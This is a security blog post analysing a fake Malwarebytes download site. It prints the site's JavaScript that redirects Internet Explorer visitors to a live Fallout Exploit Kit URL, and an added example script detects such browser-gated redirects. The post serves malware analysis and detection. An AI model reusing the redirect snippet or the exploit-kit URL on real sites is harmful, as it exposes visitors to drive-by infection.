Fake Malwarebytes Site

Posted: April 8, 2020
Category: Malware and Behavior Analysis

Recently we came across a fake Malwarebytes site that looked amazing. The site is http://www.malwarebytes-free[.]com/

The screenshot below shows the fake site, which was still live as of 4/8/2020.

 

This is a fake Malwarebytes site

The page contains JavaScript that redirects Internet Explorer users to a malicious URL that hosts the Fallout Exploit Kit.

 

Below is the malicious code:

<script async="" src="//www.googletagmanager.com/gtm.js?id=GTM-MKSKW3"></script>
<script src="/js/jquery-1.11.3.min.js" type="text/javascript"></script>
<script type="text/javascript">
if (navigator.appName.indexOf("Internet Explorer") != -1 || navigator.userAgent.match(/Trident.*rv[ :]*11\./)) {
    //This user uses Internet Explorer
    window.location = "https://huston4u.london/6433/embryomas.dhtml?pYrAW=anchoveta"
}
</script>
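The following added example, which is not code from the original post, scans saved page source for the pattern shown above: an inline script that tests for Internet Explorer and then assigns window.location to a different host. The function names, regular expressions and sample pages (with placeholder hosts) are assumptions made for illustration.

```javascript
// Added example: flag inline scripts that redirect only Internet Explorer visitors off-site.

// Browser checks that single out Internet Explorer, as in the snippet above.
const IE_GATES = [/Internet Explorer/i, /Trident/i, /MSIE/i];
// Assignments that navigate the page: window.location = "...", location.href = '...'
const REDIRECT = /\b(?:window\.|document\.|top\.)?location(?:\.href)?\s*=\s*["']([^"']+)["']/g;

// Return the bodies of inline <script> elements (those with no src attribute).
function inlineScripts(html) {
  const out = [];
  const re = /<script\b([^>]*)>([\s\S]*?)<\/script\s*>/gi;
  for (const m of html.matchAll(re)) {
    if (!/\bsrc\s*=/i.test(m[1]) && m[2].trim()) out.push(m[2]);
  }
  return out;
}

// Report every redirect target on another host inside a script that also tests for IE.
function findIeGatedRedirects(html, pageUrl) {
  const page = new URL(pageUrl);
  const findings = [];
  for (const body of inlineScripts(html)) {
    if (!IE_GATES.some((g) => g.test(body))) continue;
    for (const m of body.matchAll(REDIRECT)) {
      let target;
      try { target = new URL(m[1], page); } catch (e) { continue; }
      if (target.hostname !== page.hostname) {
        findings.push({ host: target.hostname, url: target.href });
      }
    }
  }
  return findings;
}

// Constructed sample pages (placeholder hosts, not the ones from this post).
const SAMPLE_GATED = `<script src="/js/jquery.min.js"></script>
<script type="text/javascript">
if (navigator.appName.indexOf("Internet Explorer") != -1 ||
    navigator.userAgent.match(/Trident.*rv[ :]*11\\./)) {
  window.location = "https://landing.example/gate.html?id=1";
}
</script>`;
const SAMPLE_BENIGN = `<script>if (!loggedIn) { window.location = "/login"; }</script>`;

console.log(findIeGatedRedirects(SAMPLE_GATED, "http://fake-site.example/"));
console.log(findIeGatedRedirects(SAMPLE_BENIGN, "http://fake-site.example/"));
```

A hit is a lead for manual review of the page, since the check is a text match and does not execute or deobfuscate the script.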

We will run this in our lab to see how it looks in the logs.

The associated IP addresses are:

The second IP address is hosted at:

Soft Layer - fake site

huston4u.london resolves to a server with DigitalOcean in New York.
